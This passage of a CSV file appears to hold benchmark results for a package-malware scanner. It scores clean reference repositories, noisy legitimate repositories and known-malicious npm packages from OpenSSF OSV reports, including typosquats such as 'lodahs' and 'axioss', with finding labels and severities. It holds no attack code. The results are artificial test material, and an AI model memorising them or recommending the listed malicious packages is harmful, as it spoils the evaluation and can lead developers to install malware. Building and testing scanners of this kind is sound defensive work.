corpus","https://github.com/immerjs/immer","60ca295e1185db80322ef55ec3fb8475cbc960c7","","","low","completed","true","true","true","low","0.15","true","NETWORK_URL_SHORTENER","medium","high","","60","105","false","3009","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-date-fns-date-fns","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/date-fns/date-fns","4098115cf705e3af7f663d8e5b0686e39a9f478a","","","low","completed","true","true","true","low","0.1275","true","OBF_EVAL | SUSPICIOUS_FILE_ACCESS","medium | medium | medium | medium | medium | medium | medium","low | low | low | low | low | low | medium","","200","1703","false","3523","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-ramda-ramda","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/ramda/ramda","bcb320e60b5d91c958a6b02feb0bd8658d744298","","","low","completed","true","true","true","low","0.09","true","OBFUSCATED_CODE","medium","medium","","200","513","false","3255","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-sindresorhus-got","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/sindresorhus/got","e3924aa1e53a6ca3eb93a43618ce532442a89b40","","","low","completed","true","true","true","low","0","true","","","","","87","40","false","3360","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-socketio-socket-io","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/socketio/socket.io","d2d753fed4435015c2d83fe62e676b44e07fa3f7","","","low","completed","true","true","true","low","0.27749999999999997","true","NETWORK_URL_SHORTENER | BACKDOOR_HARDCODED_AUTH | HARDCODED_SECRETS","medium | medium | medium | medium | medium","high | high | low | low | medium","","200","655","false","3192","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-apollographql-apollo-client","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/apollographql/apollo-client","c843c98a803d7d7f48f4da72080a61d9086dc8ad","","","low","completed","true","true","true","low","0","true","","","","","200","853","false","3651","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-tanstack-query","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/TanStack/query","79d2384db5c8776680d5bfbe9b595618c066248b","","","low","completed","true","true","true","low","0.15","true","HARDCODED_API_KEY","high","medium","Manual review required; this result is not yet classified as a false positive.","200","2151","false","2969","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-testing-library-react-testing-library","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/testing-library/react-testing-library","be9d81d91314c9f0bafaa363f70b409b4b31989c","","","low","completed","true","true","true","low","0","true","","","","","36","31","false","2270","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-prisma-prisma","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/prisma/prisma","cda80a4488b7b551c36bf09ca2e8303ef9509da4","","","low","completed","true","true","true","low","0.27749999999999997","true","TYPOSQUAT_PACKAGE | OBF_EVAL | HARDCODED_DB_CONNECTION","medium | medium | medium","unspecified | low | medium","","200","4471","false","3593","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-tailwindlabs-tailwindcss","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/tailwindlabs/tailwindcss","35a3e9c5159bea77af0d48f0c8849279211cc7e9","","","low","completed","true","true","true","low","0","true","","","","","200","341","false","3046","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-prettier-prettier","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/prettier/prettier","41a8b99bb8d7d68c00d90d5b8fbaed20511d4cfd","","","low","completed","true","true","true","low","0.0375","true","OBF_NEW_FUNCTION","medium | medium | medium","low | low | low","","200","9125","false","3497","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-eslint-eslint","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/eslint/eslint","c5963f74bfa82a5b7ccc0607dcdcc695b8c97a31","","","low","completed","true","true","true","low","0.0375","true","DATA_EXFILTRATION","medium","low","","200","2156","false","3330","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-pnpm-pnpm","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/pnpm/pnpm","0dd21df7457d2026f411f2c1a09104280b9b16e5","","","low","completed","true","true","true","low","0.09","true","HARDCODED_SECRETS","medium","medium","","200","4869","false","3814","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-denoland-deno","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/denoland/deno","e5aed78415ded1213794bbf1ebbde1bf5cfa08b4","","","low","completed","true","true","true","low","0.2175","true","OBFUSCATED_CODE | OBF_BASE64_HEAVY | OBF_EVAL | HARDCODED_SECRETS | NETWORK_COMMUNICATION | CODE_INTEGRITY_ISSUE","medium | medium | medium | medium | medium | medium | medium | medium | medium","medium | low | low | low | medium | medium | low | low | low","","200","14300","false","5578","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-oven-sh-bun","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/oven-sh/bun","8f1a9540fdff25410506de76e0da2506d260c08f","","","low","completed","true","true","true","low","0.18","true","OBFUSCATED_CODE | OBF_EVAL | HARDCODED_SECRETS | CODE_INTEGRITY_ISSUE","medium | medium | medium | medium","medium | low | medium | low","","200","17929","false","4040","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-tauri-apps-tauri","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/tauri-apps/tauri","f5347cd70838c027040acb4a66733a2470f20ae4","","","low","completed","true","true","true","low","0.2175","true","OBFUSCATED_CODE | SUSPICIOUS_FILE_ACCESS | HARDCODED_SECRETS","medium | medium | medium | medium","low | medium | medium | medium","","133","948","false","3368","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-puppeteer-puppeteer","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/puppeteer/puppeteer","5f5f931a0f2bc64bfb30039c507d763ce044c263","","","low","completed","true","true","true","low","0.1275","true","OBF_EVAL | EXFIL_CLIPBOARD | OBF_SETTIMEOUT_STRING","medium | medium | medium | medium | medium","low | low | medium | low | low","","200","2016","false","4027","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-microsoft-typescript","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/microsoft/TypeScript","637d5746b70257028fb95aad32ddec6b26ab0a14","","","low","completed","true","true","true","low","0.075","true","OBF_BASE64_HEAVY | OBFUSCATED_CODE | OBF_EVAL | OBF_NEW_FUNCTION | NETWORK_COMMUNICATION","medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium","low | low | low | low | low | low | low | low | low | low | low | low | low | low | low | low | low","","200","53109","true","7952","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-npm-cli","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/npm/cli","7b1f6c173d17b3bf30e45426f6df39473c6a1163","","","low","completed","true","true","true","low","0.09","true","HARDCODED_SECRETS","medium | medium | medium","medium | medium | medium","","200","6701","false","3841","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-homebrew-brew","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/Homebrew/brew","76ca8d74e4a180badad438bf245ddfc740d68a8e","","","low","completed","true","true","true","low","0.09","true","SUSPICIOUS_FILE_ACCESS","medium","medium","","200","2970","false","3802","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-python-cpython","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/python/cpython","1fece4457032382947c7c2a5c9e95dc106ca7a7d","","","low","completed","true","true","true","low","0.165","true","OBF_BASE64_HEAVY | OBF_NEW_FUNCTION | OBFUSCATED_CODE | OBF_HEX_STRINGS | DATA_EXFILTRATION | NETWORK_COMMUNICATION | CODE_INTEGRITY_ISSUE","medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium","low | low | medium | low | low | low | low | low | low | low | low | low","","200","5803","false","6846","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-django-django","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/django/django","bdbda29c3e126754c3ae04ceb5c5d35d49aae01c","","","low","completed","true","true","true","low","0","true","","","","","200","6874","false","3404","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-ansible-ansible","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/ansible/ansible","8d63341579aa1c62024f3bce1a8af3f9a1b22a16","","","low","completed","true","true","true","low","0.1275","true","NETWORK_COMMUNICATION | HARDCODED_SECRETS","medium | medium","low | medium","","200","5591","false","3448","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-scrapy-scrapy","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/scrapy/scrapy","c9446931a80e63ea1d77e130ea5581b547e0f51b","","","low","completed","true","true","true","low","0","true","","","","","200","432","false","2634","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-pallets-flask","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/pallets/flask","36e4a824f340fdee7ed50937ba8e7f6bc7d17f81","","","low","completed","true","true","true","low","0","true","","","","","107","129","false","2134","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-rust-lang-rust","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/rust-lang/rust","5503df87342a73d0c29126a7e08dc9c1255c46ad","","","low","completed","true","true","true","low","0.2025","true","OBF_BASE64_HEAVY | SUSPICIOUS_FILE_ACCESS | NETWORK_COMMUNICATION | DATA_EXFILTRATION","medium | medium | medium | medium | medium | medium | medium | medium | medium | medium","low | medium | medium | low | medium | medium | medium | low | low | low","","200","60050","true","4744","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-golang-go","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/golang/go","03845e30f7b73d1703bd8c21017297f6eecb76d6","","","low","completed","true","true","true","low","0","true","","","","","200","15414","false","3653","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2024-8862","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2024-8862; report blob cebceb18d12edabb3bf055a6936a367b0614e792","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/bcrypts-js/MAL-2024-8862.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:cebceb18d12edabb3bf055a6936a367b0614e792:7c7ee68d6f6b26b48726c11558dc9206bf998cf9","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2024-1377","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2024-1377; report blob c78863fed3a5a3b662b72b05c16b77d9dc153665","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/cors-parser/MAL-2024-1377.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:c78863fed3a5a3b662b72b05c16b77d9dc153665:3e4eb5c422572ea85c1fff43d7e1f202899068b3","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.4","false","SUSPICIOUS_DEPENDENCY","critical","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-19413","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-19413; report blob 84b9fce13d64dd7ec790910850e9fbbbf58cf348","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/electorn/MAL-2025-19413.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:84b9fce13d64dd7ec790910850e9fbbbf58cf348:d511c4332bf47892ca7bf08a3ad5e06ccc7224fb","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-20690","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-20690; report blob 2fdd79a99598980c7c4cbaad70833538b602a95c","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/flatmap-stream/MAL-2025-20690.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:2fdd79a99598980c7c4cbaad70833538b602a95c:faa25eec2f63ebf17e74b3d3dad492afa2bdc214","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.4","false","SUSPICIOUS_DEPENDENCY","critical","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-25502","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-25502; report blob 67e0222164b6b5f6ec72ce58d7a20b430cac4dd2","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/lodahs/MAL-2025-25502.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:67e0222164b6b5f6ec72ce58d7a20b430cac4dd2:5ee45d530dcca44dea28a23994dbcdbecfc63f8e","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.4","false","SUSPICIOUS_DEPENDENCY | TYPOSQUAT_PACKAGE","high | medium","high | unspecified","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-4275","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-4275; report blob 238dc228cd9cf54efea67c07f9bc7089b15207b4","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios.js/MAL-2025-4275.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:238dc228cd9cf54efea67c07f9bc7089b15207b4:e015c3138480f5286955833abfb3bea47471688d","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2026-4493","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2026-4493; report blob 366383ef9f8518dfc534b911251a2dbe5ccd3928","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axiosqqq/MAL-2026-4493.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:366383ef9f8518dfc534b911251a2dbe5ccd3928:bb3d39dbc3518a28407d264f2abcf070c3a3657b","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-15242","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15242; report blob 5850d1f4f2806fd59eb535b3e4d45beb058bc826","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axioss/MAL-2025-15242.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:5850d1f4f2806fd59eb535b3e4d45beb058bc826:81363d511fb327ca5616ccfcba7c5393e1a0044c","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.4","false","SUSPICIOUS_DEPENDENCY | TYPOSQUAT_PACKAGE","high | medium","high | unspecified","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-15281","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15281; report blob e6a3d9c6a3d214bff2f326a8f1d8ba8ac8c1d472","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-laoder/MAL-2025-15281.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:e6a3d9c6a3d214bff2f326a8f1d8ba8ac8c1d472:7ae13db475be04ecc7d2b6fcef3b20c40bbc2e03","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-15282","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15282; report blob b23f507de17d8c239290fb1c36a5d9a6d886b92c","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loadre/MAL-2025-15282.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:b23f507de17d8c239290fb1c36a5d9a6d886b92c:cb4b464cf4c2449f6ad3903bd3e62fbe9c7579dd","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-15283","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15283; report blob a98eafc3406e034fe14c4e2fe25edc21ee7e9a47","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loqder/MAL-2025-15283.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:a98eafc3406e034fe14c4e2fe25edc21ee7e9a47:b2eee8c6fb943b5b47deffd77c116865d4d2ddee","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-15286","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15286; report blob 7d72739e67fda4b48cc77bfcb6c868feafd17567","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-node/MAL-2025-15286.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:7d72739e67fda4b48cc77bfcb6c868feafd17567:9b2980f27303a4070b0e103b0621839940ee9724","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-15289","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15289; report blob 283dd8d75b91d4a35c89707bd10115e3d2ff9c69","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-pal/MAL-2025-15289.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:283dd8d75b91d4a35c89707bd10115e3d2ff9c69:55744bedf6294386bdc1eec2313e9b485a77322f","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-15238","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15238; report blob aceadeea25bc4b32b766096204db12a15315e090","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-http/MAL-2025-15238.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:aceadeea25bc4b32b766096204db12a15315e090:30af885d0884dd6cec7fdbfb7ba0a3248110b517","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2023-116","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2023-116; report blob 0d58b457e7175cc230bff6d7b6da40d3781a5466","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-proxy/MAL-2023-116.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:0d58b457e7175cc230bff6d7b6da40d3781a5466:216fcbc2c9356dbccfd103971f088bcb84682b06","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-4813","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-4813; report blob bcd00abcd6ee4bb4083f79b6e4d10b6d289aa392","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-browserify/MAL-2025-4813.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:bcd00abcd6ee4bb4083f79b6e4d10b6d289aa392:2bae461ccd66abc5ecc0082b8681a81c125302b6","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-190832","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-190832; report blob b9b988a111a6e0915333f4b29ce75fb1fe05f293","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-builder/MAL-2025-190832.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:b9b988a111a6e0915333f4b29ce75fb1fe05f293:6ac5ebe76f27904cfdec2d27badfa7ad53d6f11d","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2024-10692","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2024-10692; report blob 79cb12c286a16d2f04288db57a43bce0b197d907","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-mockadptr/MAL-2024-10692.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:79cb12c286a16d2f04288db57a43bce0b197d907:4a871bf8d97a4ffd916e71d4102e1a09b3d38d6d","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-191389","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-191389; report blob 6bae4d1fc6ab36b3516d10c59910f905e50c4f3a","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-cancelable/MAL-2025-191389.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:6bae4d1fc6ab36b3516d10c59910f905e50c4f3a:5a611b4143b8b29595533761d56448dc59603cd8","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2026-2631","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2026-2631; report blob d20844f3c5e46ef0707cdad324c86ce0b027a8fa","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-plugin-blocks/MAL-2026-2631.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:d20844f3c5e46ef0707cdad324c86ce0b027a8fa:4f055c91abd296b619826fad2bb36752f7f939a7","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-47613","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-47613; report blob 3075fa3df8d2b7a89c816127adda2b9188415350","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-ganache/MAL-2025-47613.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:3075fa3df8d2b7a89c816127adda2b9188415350:2aaacc868e3b819e0e9d4dbb9a9d58b5d83906ff","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2026-407","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2026-407; report blob 6bbba35a96333e1960acec15928b07c83544e48a","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-js/MAL-2026-407.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:6bbba35a96333e1960acec15928b07c83544e48a:9897f3726f56deb821827c8de18501abead258f2","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-15287","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15287; report blob 